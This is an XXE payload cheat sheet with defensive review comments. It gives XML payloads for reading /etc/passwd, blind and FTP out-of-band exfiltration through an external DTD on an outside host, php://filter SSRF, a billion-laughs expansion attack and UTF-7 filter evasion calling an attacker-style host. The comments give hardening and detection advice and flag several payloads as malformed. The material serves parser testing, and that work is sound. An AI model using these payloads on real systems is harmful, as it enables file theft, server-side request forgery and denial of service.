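XML External Entity (XXE)
Each listing below is a test document for checking how an XML parser treats DTD entity declarations in untrusted input; a parser that refuses DOCTYPE declarations in untrusted input rejects all of them.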
LFI Test
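<?xml version="1.0"?>
<!-- Parser-hardening check: `xxe` is an external general entity whose SYSTEM
     identifier is a local file URI. If the parser resolves external entities and
     the application reflects the content of <foo>, the response carries the
     file's contents. Expected result on a hardened parser: the DOCTYPE is
     refused, or the reference to `xxe` is left unresolved. -->
<!DOCTYPE foo [
<!-- NOTE(review): `(#ANY)` is not a content model defined by the XML grammar
     (the keyword form is plain ANY, as in the UTF-7 listing on this page). A
     strict parser may stop here with a syntax error, and that rejection says
     nothing about whether external entities are disabled. -->
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>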
Blind LFI test (when first case doesn't return anything)
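<?xml version="1.0"?>
<!-- Out-of-band variant of the file-read check: `xxe` is a parameter entity
     bound to a local file, and `blind` is an external general entity whose URL
     embeds a reference to it, so the signal is an outbound request rather than
     anything in the response body.
     Defence and detection: refuse DOCTYPE declarations; deny outbound HTTP(S)
     from hosts that parse untrusted XML; alert on DNS lookups or connections
     from those hosts to destinations outside an allow-list. -->
<!DOCTYPE foo [
<!-- NOTE(review): `(#ANY)` is not a content model defined by the XML grammar;
     a strict parser may reject the DTD at this declaration for syntax reasons,
     which does not demonstrate that entity resolution is disabled. -->
<!ELEMENT foo (#ANY)>
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
<!ENTITY blind SYSTEM "https://www.example.com/?%xxe;">]><foo>&blind;</foo>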
Access Control bypass (loading restricted resources - PHP example)
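<?xml version="1.0"?>
<!-- PHP-specific check: the SYSTEM identifier of `ac` uses the php://filter
     stream wrapper with the convert.base64-encode read filter around an HTTP
     resource. The fetch is made by the server itself, so a resource that is
     restricted by client address is requested from a trusted position, and the
     base64 step keeps the returned bytes from breaking the XML.
     Hardening: do not pass LIBXML_NOENT or LIBXML_DTDLOAD when loading
     untrusted XML; on PHP versions before 8.0 also call
     libxml_disable_entity_loader(true). Access control that relies only on the
     caller being the local server should not be treated as sufficient. -->
<!DOCTYPE foo [
<!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]>
<foo><result>&ac;</result></foo>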
SSRF Test
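<?xml version="1.0"?>
<!-- Server-side request check: `xxe` points at an HTTPS URL, so a parser that
     resolves external entities makes the request from the server's network
     position. A request arriving at the named host is the signal.
     Defence and detection: disable external entity resolution; restrict egress
     from XML-processing services to an allow-list; log outbound requests made
     by those services so unexpected destinations stand out. -->
<!DOCTYPE foo [
<!-- NOTE(review): `(#ANY)` is not a content model defined by the XML grammar;
     a strict parser may reject the DTD here on syntax alone, which is not
     evidence that external entities are disabled. -->
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "https://www.example.com/text.txt">]><foo>&xxe;</foo>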
XEE (XML Entity Expansion - DOS)
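<?xml version="1.0"?>
<!-- Entity-expansion (resource exhaustion) check. No external resource is
     involved: every entity is internal, and each level references the previous
     one ten times. Nine levels give 10^9 copies of the three-byte string
     "lol", roughly 3 GB of text, from well under a kilobyte of declarations.
     Disabling external entities alone does not stop this.
     Defence: refuse DOCTYPE declarations in untrusted input, or keep the
     parser's entity-expansion limits on (Java: FEATURE_SECURE_PROCESSING;
     libxml2: do not set XML_PARSE_HUGE), and bound request size, memory and
     parse time for the service. -->
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>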
XEE #2 (Remote attack - through external xml inclusion)
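<?xml version="1.0"?>
<!-- Expansion check where the entity body lives in a remote XML file: the
     content that gets expanded never appears in this document, so inspecting
     the submitted XML alone does not show what the parser will process.
     Defence: disable external entity resolution and keep entity-expansion
     limits enabled; restrict egress from the parsing host. -->
<!DOCTYPE lolz [
<!ENTITY test SYSTEM "https://example.com/entity1.xml">]>
<!-- NOTE(review): the line below is not well-formed as printed: the reference
     to `test` has no terminating semicolon and the inner <lol> start tag is
     never closed. A conformant parser rejects the document on syntax alone,
     and that rejection does not show that external entities are disabled. -->
<lolz><lol>3..2..1...&test<lol></lolz>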
XXE FTP HTTP Server
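<!-- Out-of-band check built on parameter entities. `remote` loads an external
     DTD over HTTP; the reference to `remote` pulls that DTD's declarations
     into this document, and the reference to `send` then uses an entity that
     only the external DTD declares. The document body itself is inert.
     Defence and detection: refuse DOCTYPE declarations, or at minimum disable
     loading of external DTDs and parameter entities; deny outbound HTTP and
     FTP from hosts that parse untrusted XML and alert on attempts. -->
<!DOCTYPE data [
<!ENTITY % remote SYSTEM "http://publicServer.com/parameterEntity_sendftp.dtd">
%remote;
%send;
]>
<data>4</data>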
Contents of the external DTD served at http://publicServer.com/parameterEntity_sendftp.dtd:
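<!-- External DTD for the parameter-entity check. `param1` holds the text of a
     second declaration, for the parameter entity `send`, whose SYSTEM
     identifier is an FTP URL; &#37; is the character reference for the percent
     sign, so the inner declaration only takes effect when `param1` is
     expanded on the last line. A parser that never loads external DTDs never
     reads this file, which is why disabling external DTD loading is the
     control to verify. -->
<!ENTITY % param1 "<!ENTITY &#37; send SYSTEM 'ftp://publicServer.com/%payload;'>">
%param1;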
XXE UTF-7
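<?xml version="1.0" encoding="UTF-7"?>
<!-- Encoding check: the declaration above asks the parser to decode the rest
     of the document as UTF-7, so the markup characters of the DOCTYPE and
     ENTITY declarations are not present as literal bytes. Filters that match
     on the raw request body will not see them. XML processors are only
     required to support UTF-8 and UTF-16.
     Defence: accept only an allow-list of encodings (normally UTF-8) and
     reject anything else before parsing; run any content inspection on the
     decoded document; refuse DOCTYPE declarations in the parser itself. -->
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4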
To convert between UTF-8 and UTF-7, use recode: `recode UTF8..UTF7 payload-file.xml`